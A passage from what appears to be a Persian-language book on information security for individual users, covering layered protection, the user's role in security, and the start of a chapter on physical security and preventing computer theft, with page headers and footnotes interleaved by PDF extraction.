‫ﻣﺸﻜﻼﺕ ﺑﻴﺸﺘﺮﻱ ﻣﻮﻓﻖ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ‪ .‬ﻋﻤﻞ ﺭﺍﻧﻨﺪﮔﻲ ﺭﺍ ﺩﺭﻧﻈـﺮ‬
‫ﺑﻴﺎﻭﺭﻳﺪ‪ .‬ﺑﻨﻈﺮ ﺷﻤﺎ ﭼﻪ ﺗﺪﺍﺑﻴﺮﻱ ﻣﻲﺗﻮﺍﻥ ﺍﻧﺪﻳـﺸﻴﺪ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ‬
‫ﻭﻗﻮﻉ ﺗﺼﺎﺩﻑ ﻛﺎﻫﺶ ﻳﺎﺑﺪ؟‬
‫ﺑﻌﻀﻲ ﺍﺯ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩﺍﻧﺪ‪:‬‬
‫•‬
‫ﭼﻨﺎﻧﭽﻪ ﻣﺎﺷﻴﻦ ﻧﻴﺎﺯ ﺑﻪ ﺗﻌﻤﻴﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﻪ ﺩﺭﺳﺘﻲ‬
‫ﺗﻌﻤﻴﺮ ﺷﻮﺩ‪.‬‬
‫•‬
‫ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺑﺎ ﺩﻗﺖ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪.‬‬
‫•‬
‫ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﺧﺎﻧـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻭﺟـﻮﺩ ﻋﻴﺒـﻲ ﺩﺭ ﻣﺎﺷـﻴﻦ‬
‫ﻫﺸﺪﺍﺭ ﺩﻫﺪ ﻛﻪ ﺑﺎ ﺳﻼﻣﺖ ﺍﻓﺮﺍﺩ ﻣﺮﺗﺒﻂ ﺑﺎﺷﺪ‪ ،‬ﺁﻥ ﻋﻴـﺐ‬
‫ﺑﺎﻳﺪ ﺳﺮﻳﻌﹰﺎ ﺭﻓﻊ ﮔﺮﺩﺩ‪.‬‬
‫•‬
‫ﻫﻨﮕﺎﻡ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺍﺣﺘﻴﺎﻁ ﻛﺮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺮﺍﻳﺘﺎﻥ ﻣﺸﻜﻞ ﺑﻴﺎﻓﺮﻳﻨﻨﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺩﺭ ﺭﻭﺯﻧﺎﻣﻪ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﭘﻠﻲ ﺷﻜﺴﺘﻪ ﺍﺳﺖ‪،‬‬
‫ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺮ ﺭﻭﻱ ﺁﻥ ﭘﺮﻫﻴﺰ ﺷﻮﺩ‪.‬‬
‫ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻋﻮﺍﻣﻞ ﺑﺎﻻ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻗﺎﺩﺭ ﺑـﻪ ﺗـﻀﻤﻴﻦ ﺳـﻼﻣﺖ‬
‫ﺷﻤﺎ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ ،‬ﻭﻟﻲ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻫﻤـﺔ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺗﺼﺎﺩﻑ ﺭﺍ ﺗﺎ ﺣـﺪ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ ﺩﺍﺩ‪ .‬ﺩﺭ‬
‫ﺗﺪﻭﻳﻦ ﺍﺟﺰﺍﻱ ﻳـﻚ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺍﻓـﺮﺍﺩ ﺑﺎﻳـﺪ ﻻﻳـﻪﻫـﺎﻳﻲ ﺍﺯ‬
‫ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧـﺪ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺣﺘـﻲ ﺗـﺎ ﺣـﺪﻭﺩﻱ‬
‫ﺗﻜﺮﺍﺭﻱ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺩﺭﻙ ﺑﻬﺘﺮ ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ‬
‫ﻳﻚ ﺗﻜﻪ ﺟﻮﺍﻫﺮ ﻗﻴﻤﺘﻲ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴـﺪ‪ .‬ﻣـﺴﻠﻤﹰﺎ ﺁﻧـﺮﺍ ﺩﺭ ﻳـﻚ‬
‫ﺟﻌﺒﺔ ﺳﺮﺑﺴﺘﻪ ﻭ ﺳﭙﺲ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﻗﻔﻞﺷﺪﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴـﺪ؛ ﻭ‬
‫ﺟﻬﺖ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ‪ ،‬ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺳـﺮﻗﺖ ﻧﻴـﺰ ﺑﻴﻤـﻪ‬
‫ﺧﻮﺍﻫﻴﺪ ﻧﻤﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﻋﻤﻞ ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﭼﻨـﺪﻳﻦ ﻣﺮﺣﻠـﻪ‬
‫ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺣﻞ ﺑـﻪ ﺗﻨﻬـﺎﻳﻲ ﺿـﺮﻳﺐ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﻮﺍﻫﺮ ﺭﺍ ﻛﻤﻲ ﺑﺎﻻ ﻣﻲﺑﺮﻧﺪ‪ ،‬ﻭﻟﻲ ﻣﺴﻠﻤﹰﺎ ﺑﻜـﺎﺭﮔﻴﺮﻱ‬
‫ﺗﻤﺎﻡ ﻣﺮﺍﺣﻞ ﻋﺎﻗﻼﻧﻪﺗﺮ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﻣﺮﺣﻠـﻪ ﺑـﺎ‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫‪٥٣‬‬
‫ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﻣﺮﺍﺣﻞ ﺩﻳﮕﺮ ﺩﺭ ﺭﺳﻴﺪﻥ ﺷﻤﺎ ﺑﻪ ﻣﻮﻓﻘﻴﺖ‬
‫ﻼ ﺍﮔﺮ ﺷﺨﺼﻲ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻋﺘﻤـﺎﺩ ﺩﺭ ﺧﺎﻧـﻪ ﺑﺎﺷـﺪ‪،‬‬
‫ﻛﻤﻚ ﺧﻮﺍﻫﺪ ﻛﺮﺩ )ﻣﺜ ﹰ‬
‫ﻣﺴﻠﻤﹰﺎ ﻗﻔﻞ ﻛﺮﺩﻥ ﺩﺭ‪ ،‬ﺭﺍﻩ ﻣﻨﺎﺳﺒﻲ ﻧﻴﺴﺖ(‪.‬‬
‫ﻧﻘﺶ ﻛﺎﺭﺑﺮ ﺩﺭ ﺍﻣﻨﻴﺖ‬
‫ﺍﻭﻟﻴﻦ ﻛﺎﺭﺑﺮ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ ﻧﻘـﺶ ﻣﻬﻤـﻲ ﺩﺭ‬
‫ﺗــﻀﻤﻴﻦ ﺍﻳﻤﻨــﻲ ﺭﺍﻳﺎﻧــﻪ ﻭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺁﻥ ﺩﺍﺭﺩ‪ .‬ﺩﺭﻣﺠﻤــﻮﻉ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﻧﻴـﺰ ﺩﺭ ﺗـﻀﻤﻴﻦ ﺩﻗـﺖ ﺩﺭ ﻋﻤﻠﻴـﺎﺕ ﺣﻔﺎﻇـﺖ ﻭ‬
‫ﺍﻳﻤﻨﻲ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﻧﺪ‪ .‬ﺩﻗﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ‬
‫ﻧﺴﺒﺖ ﺑﻪ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻧﺪ ﺧﻮﺩ ﺍﺯ ﺑﺰﺭﮔﺘﺮﻳﻦ‬
‫ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻳﻚ ﻫﻨﺮ ﺍﺳﺖ‪ ،‬ﻧﻪ ﻳﻚ ﻋﻠﻢ‬
‫ﺩﺭ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﻫﻴﭻ ﺗﻀﻤﻴﻦ ﺻـﺪ ﺩﺭﺻـﺪﻱ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻫﻤﻴﺸﻪ ﻧﻘﺎﻳﺺ ﺗﺎﺯﻩ ﻭ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳﺪ ﻧﻔـﻮﺫ‬
‫ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﻧـﻮ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻣـﺸﻜﻞ ‪ -‬ﻛـﻪ ﺧـﻮﺩ ﻧﺎﺷــﻲ ﺍﺯ‬
‫ﺧﻄﺎﻫﺎﻱ ﺍﻧﺴﺎﻧﻲ ﺍﺳﺖ ‪ -‬ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺍﻣﺎ ﺍﮔـﺮ ﻣﻄﺎﻟﻌـﺔ‬
‫ﺩﻗﻴﻘﻲ ﺍﻧﺠﺎﻡ ﺑﮕﻴﺮﺩ ﻭ ﺍﺯ ﺗﺠﺎﺭﺏ ﻣﻮﻓﻖ ﺍﻣﻨﻴﺘﻲ‪ ١٢‬ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﻮﺩ‬
‫ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﻋﻤﻠﻜــﺮﺩ ﺳﻴــﺴﺘﻢ ﺍﻣﻨﻴــﺖ ﻻﺯﻡ ﺭﺍ ﺑﻮﺟــﻮﺩ ﺁﻭﺭﺩ‪.‬‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻭ ﮔﺮﻭﻫﻬـﺎﻱ ﭘـﺴﺘﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻛﻤﻜﻬـﺎﻱ ﺷـﺎﻳﺎﻧﻲ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﭼﺮﺍﻛــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺷــﺮﺍﻳﻂ ﻏﻴــﺮ ﻣﻌﻤــﻮﻝ ﻭ ﺑــﺮﻭﺯ ﻭﺿــﻌﻴﺖ‬
‫ﻏﻴﺮﻋﺎﺩﻱ ﺍﺯ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﮔﺮﻓﺖ‪.‬‬
‫‪Encryption‬‬
‫‪Security Best Practices‬‬
‫‪11‬‬
‫‪12‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻓﻨـﻮﻥ‬
‫ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺎ ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﺷﻲ‬
‫ﺍﺯ ﻣﺸﻜﻼﺕ ﻃﺮﺍﺣﻲ‪ ،‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺿﻌﻴﻒ ﻭ ﻳﺎ ﺧﻄﺎﻫﺎﻱ ﺍﻧـﺴﺎﻧﻲ‬
‫ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻮﺭﺩ ﻣـﺸﻜﻼﺕ ﺍﺑﺰﺍﺭﻫـﺎﻳﻲ ﻣﺜـﻞ‬
‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ١١‬ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺻﺪﻕ ﻛﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ‬
‫ﭼﻮﻥ ﺍﻣﻜﺎﻥ ﺷﻜﺴﺖ ﺑﺮﺍﻱ ﻫﺮﻛـﺪﺍﻡ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻧﻲ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﺑﺮ ﻳﻚ ﺷﻴﻮﻩ ﺗﻜﻴﻪ ﻧﻤﻮﺩ‪.‬‬
‫‪٥٥‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ‬
‫ﻓﺼﻞ ﺳﻮﻡ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ‬
‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﺭﺍﻫﻬﺎﻳﻲ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬـﺎ‬
‫ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻴﺰﻳﻜـﻲ ﺍﻳﻤـﻦ ﻛـﺮﺩ ﻭ ﺍﺯ ﺳـﺮﻗﺖ‬
‫ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤـﻮﺩ‪ .‬ﻣﺒﺎﺣـﺚ ﻋﻤـﺪﺓ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‪ ،‬ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‪ ،‬ﻭ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ‪.‬‬
‫ﻣﻘﺪﻣﻪ‬
‫ﻗﺎﻧﻮﻥ ﺍﻭﻝ‪:‬‬
‫ﻗﺒﻞ ﺍﺯ ﻭﻗﻮﻉ ﺳﺮﻗﺖ‪ ،‬ﺑﻪ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻓﻜﺮ ﻛﻨﻴﺪ‪.‬‬
‫ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺴﻴﺎﺭ ﺁﺯﺍﺭ ﺩﻫﻨﺪﻩ ﺍﺳﺖ ﻭ ﭼﻨﺎﻧﭽـﻪ ﺑﻴﻤـﻪ‬
‫ﻧﺒﺎﺷﻴﺪ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺭﺍ ﺑﺮ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﺧﻮﺍﻫﺪ ﻛﺮﺩ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ‬
‫ﻣﻮﺍﻗﻊ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻋﺚ ﺍﻓﺸﺎﻱ ﺍﻣﻮﺭ ﺷـﻐﻠﻲ ﻭ ﻳـﺎ ﺍﺳـﺮﺍﺭ‬
‫ﻣﺤﺮﻣﺎﻧﺔ ﺍﺷﺨﺎﺹ ﻣﻲﮔﺮﺩﺩ ﻭ ﺩﺭ ﺷﺮﺍﻳﻂ ﺑـﺪﺗﺮ‪ ،‬ﺳـﺮﻗﺖ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺑﺎﻋﺚ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻐﻞ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﭼﻨﺎﻧﭽـﻪ ﺩﺭ ﺍﻳـﻦ‬
‫ﺧﺼﻮﺹ ﭼﻨـﺪ ﺭﻭﺵ ﺳـﺎﺩﻩ ﻭ ﺍﺭﺯﺍﻥﻗﻴﻤـﺖ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﺷـﻮﺩ‬
‫ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ﻭ ﻛﻴﻔﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻛـﺮﺩ‬
‫ﻳﺎ ﺣﺪﺍﻗﻞ ﺍﺣﺘﻤﺎﻝ ﺁﻧﺮﺍ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﻛﺎﻫﺶ ﺩﺍﺩ‪.‬‬
‫ﻳﻜﻲ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩﻫـﺎﻱ ﺩﺭﻙ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺿﺎﺑﻄﻪﻣﻨﺪ‪ ١٣‬ﺍﺳﺖ‪ .‬ﺑﺎ ﺷـﺮﻭﻉ ﺍﺯ ﻣﻌﺮﻓـﻲ‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ‪ ،‬ﺩﺭ ﺳﺎﻳﺮ ﻓـﺼﻮﻝ ﺑﺨـﺶ ﺩﻭﻡ ﺑـﻪ‬
‫ﺑﺮﺭﺳﻲ ﺟﻮﺍﻧﺐ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ ﻭ ﺍﺳﺎﺱ ﺍﺳـﺘﻘﺮﺍﺭ‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑـﺮﺍﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷﺨـﺼﻲ ﻭ ﮔـﺮﻭﻩﻫـﺎﻱ‬
‫ﻛﻮﭼﻚ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺗﻮﺿﻴﺢ ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ‪ .‬ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬
‫ﺟﻨﺒﻪ ﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮔﺘـﺮ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﺣﺮﻓـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﭘــﻨﺠﻢ ﺍﺭﺍﺋــﻪ ﺷــﺪﻩ ﺍﺳــﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺑــﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺎ ﻛﻠﻴﺎﺕ ﻣﻮﺿﻮﻉ ﺁﺷﻨﺎ ﺷـﺪﻳﺪ‪،‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﭘﻨﺠﻢ )ﺍﻣﻨﻴﺖ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ( ﺑﺮ ﺩﺍﻧﺶ ﻓﻨﻲ ﺧﻮﺩ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ‪.‬‬
‫ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬
‫ﭼﻨﺪ ﺭﺍﻩ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭ ﻛﺮﺩﻥ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺍﻭﻟﻴﻦ ﻣﺮﺣﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﺍﺯ‬
‫ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺴﺘﻪ ﺑـﻪ‬
‫ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻛﺠـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩﺍﻳـﺪ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ‬
‫ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﭼﻪ ﺣﺴﺎﺳﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ ﻳﻚ ﻗﺴﻤﺖ ﺟﺰﺋﻲ ﻳﺎ‬
‫ﻳﻚ ﻗﺴﻤﺖ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻣﺤﺴﻮﺏ ﺷﻮﺩ‪.‬‬
‫‪Rule-Based Approach‬‬
‫‪13‬‬
‫ﺩﻭ ﺭﺍﻫﻜﺎﺭ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺩﺯﺩﻱ ﺭﺍﻳﺎﻧـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ :‬ﻛـﺎﺭﻱ‬
‫ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ؛ ﻭ ﻳﺎ ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ‬
‫ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ‪.‬‬
‫•‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻣﺤﻞ ﻧﮕﻬـﺪﺍﺭﻱ ﺭﺍﻳﺎﻧـﻪ ﺍﻣـﻦ‬
‫ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺍﺯ ﺁﻥ ﺩﺭ ﻳـﻚ ﺍﺗـﺎﻕ‬
‫ﻗﻔﻠﺪﺍﺭ ﻧﮕﻬﺪﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ﻭ ﻳﺎ ﺍﮔﺮ ﺩﺭ ﻣﺤﻞ ﻛـﺎﺭ ﺧـﻮﺩ ﺑـﺎ‬
‫ﻫﻤﻜﺎﺭﺍﻥ ﺩﻳﮕﺮﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﻣﻌﺮﺽ ﺩﻳـﺪ‬
‫ﺁﻧﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﺤﺎﻓﻞ ﻋﻤﻮﻣﻲ ﻣﺎﻧﻨـﺪ‬
‫ﻓﺮﻭﺩﮔﺎﻩﻫﺎ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻧﻜﻨﻴﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺯﻣـﺎﻥ ﻋـﺪﻡ ﺣـﻀﻮﺭ ﺷـﻤﺎ ﺩﺭ‬
‫ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷﺨـﺼﻲ ﺷـﺒﺎﻧﻪ ﻭﺍﺭﺩ ﺍﺗـﺎﻕ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺸﻜﻠﻲ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺖ‪ .‬ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻭ ﺧـﺼﻮﺻﹰﺎ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺑﻪ ﺳﺎﺩﮔﻲ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺑـﺴﻴﺎﺭ ﺳـﺨﺖ‬
